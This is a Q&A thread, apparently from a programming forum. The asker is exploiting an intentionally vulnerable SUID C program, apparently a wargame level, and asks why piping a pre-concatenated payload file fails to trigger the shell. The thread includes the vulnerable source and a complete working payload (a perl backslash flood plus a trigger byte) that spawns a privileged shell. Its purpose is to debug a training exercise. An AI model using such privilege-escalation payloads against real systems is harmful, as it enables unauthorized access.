# Weird cat behaviour on concatenating files

Tags: linux, bash

I am exploiting a SUID program where after I supply a payload a /bin/sh shell is spawned and then I write the commands I want to be executed in a file called commandsFile which I pipe to the program

```
cat payload commandsFile | ./vulnProg
```

This works just fine. The commands which are there on the commandsFile are promptly executed and the outputs are shown by the newly spawned sh shell, and after executing all of them the sh terminates and I am back to my bash prompt.

However if I try a simple variation of cat...

```
cat payload commandsFile > combinedFile
cat combinedFile | ./vulnProg
```

...no command is executed now. I am back to my bash prompt with absolutely no output.

I have tried...

```
cat payload commandsFile | xxd
```

and

```
cat payload commandsFile > combinedFile
cat combinedFile | xxd
```

to see what the vulnProg is "seeing". They are absolutely the same, every byte, every newline character position. My question is why the first version will work while the second won't? What is the difference between the two?

The vulnerable program:

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>


#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)
{
    int i;

    printf("[ ");
    for(i=0; i < len; i++) printf("%x ", buf[i]); 
    printf(" ]\n");
}

int main()
{
    unsigned char buf[512];
    unsigned char *ptr = buf + (sizeof(buf)/2);
    unsigned int x;

    while((x = getchar()) != EOF) {
            switch(x) {
                    case '\n': print(buf, sizeof(buf)); continue; break;
                    case '\\': ptr--; break; 
                    default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
            }
    }
    printf("All done\n");
}
```

My exact payload:

```
perl -e "print '\\\'x889192448" > /var/tmp/payload #move back ptr so that it starts with CA instead of FF which it initially contains.
echo a >> /var/tmp/payload #so that e() is called which spawns the shell
```

My commandsFile:

```
whoami
date
date
```

Some useful outputs:

```
$ sha1sum /var/tmp/combinedFile
1a0ba5bbdf9709e3f317b10a928a91dd63195733  /var/tmp/combinedFile

$ cat /var/tmp/payload /var/tmp/commands |sha1sum
1a0ba5bbdf9709e3f317b10a928a91dd63195733  -
```

Also:

```
$ strace -o /var/tmp/log1 cat /var/tmp/payload /var/tmp/commands > /dev/null
$ strace -o /var/tmp/log1 cat /var/tmp/payload /var/tmp/commands > /dev/null
$ diff /var/tmp/log1 /var/tmp/log2

1c1
< execve("/bin/cat", ["cat", "/var/tmp/payload", "/var/tmp/commands"],    [/* 21 vars */]) = 0
---
> execve("/bin/cat", ["cat", "/var/tmp/combinedFile"], [/* 21 vars */]) = 0
29,30c29,30
< open("/var/tmp/payload", O_RDONLY)   = 3
< fstat(3, {st_mode=S_IFREG|0664, st_size=889192450, ...}) = 0
---
> open("/var/tmp/combinedFile", O_RDONLY)   = 3
> fstat(3, {st_mode=S_IFREG|0664, st_size=889192470, ...}) = 0
27168,27176c27168,27169
< read(3, "a\n", 65536)                   = 2
< write(1, "a\n", 2)                      = 2
< read(3, "", 65536)                      = 0
< close(3)                                = 0
< open("/var/tmp/commands", O_RDONLY)     = 3
< fstat(3, {st_mode=S_IFREG|0664, st_size=20, ...}) = 0
< fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
< read(3, "whoami\ndate \ndate\n\n\n", 65536) = 20
< write(1, "whoami\ndate \ndate\n\n\n", 20) = 20
---
> read(3, "a\nwhoami\ndate \ndate\n\n\n", 65536) = 22
> write(1, "a\nwhoami\ndate \ndate\n\n\n", 22) = 22
```

However I am not getting this output. Can someone please explain it?

Comment: You may want to provide insight into what is in `payload` and `commandsFile`, otherwise, we are left guessing.

Comment: Cats are notoriously whimsical. ;)

Comment: My guess would be that there is a flush of the output stream between the two files in the first case, which could make the difference... Without more detail it's really hard to say more.

Comment: try `cat combinedFile emptyFile | ./vulnProg` ?

Comment: commandsFile is constructed in nano. Just three words(simple linux one-word commands) separated by newlines are there; ls, whoami and date.    Payload is constructed by entering the following two commands: ...  perl -e "print '\\\'x889" > payload... and the next command:... echo a >> payload... I had to construct this way because of the specific nature of the vulnerable program. [Note; no fullstop '.' is present in the actual commands]. In case you ned furthur information, please do tell.

Comment: @user257330: can you paste the output of `sha1sum combinedFile` and `cat payload commandsFile | sha1sum`?

Comment: @knittl, I have added the 2 outputs in edit. Please check them out.

Comment: If it's not a difference in the file contents perhaps it's a side-effect of having executed the `cat` previously.

Answer (score 1):

Presuming that the data really are the same (and your checksums suggest they are), then there must be some oddity in the way they are delivered?

I can't tell you what that is, but I know how to find out: use `strace` to watch the system calls `cat` makes in each case.

```
strace -o log1 cat payload commandsFile > /dev/null
strace -o log2 cat combinedFile > /dev/null
diff log1 log2
```

If that doesn't show anything different then try tracing `vulnProg` in a similar way, or tracing `cat` with a pipe, not a redirect.

You might also try turning the trace verbosity level up (see `strace --help`).

Finally, if all else fails, step through the `vulnProg` code with GDB.

---

Edit:

Looking at your traces, it's clear that the one case uses two `write` calls to achieve what the other does with one. That might make a difference to a poorly written program using non-blocking reads, but your program looks fine.

Comment: I have included the output in the edit. Please do check it. I am not understanding. Thanks in advance.

Comment: I'm afraid I don't see anything suspect (see my edit). You're going to have to do some more experiments and stare at the results a bit.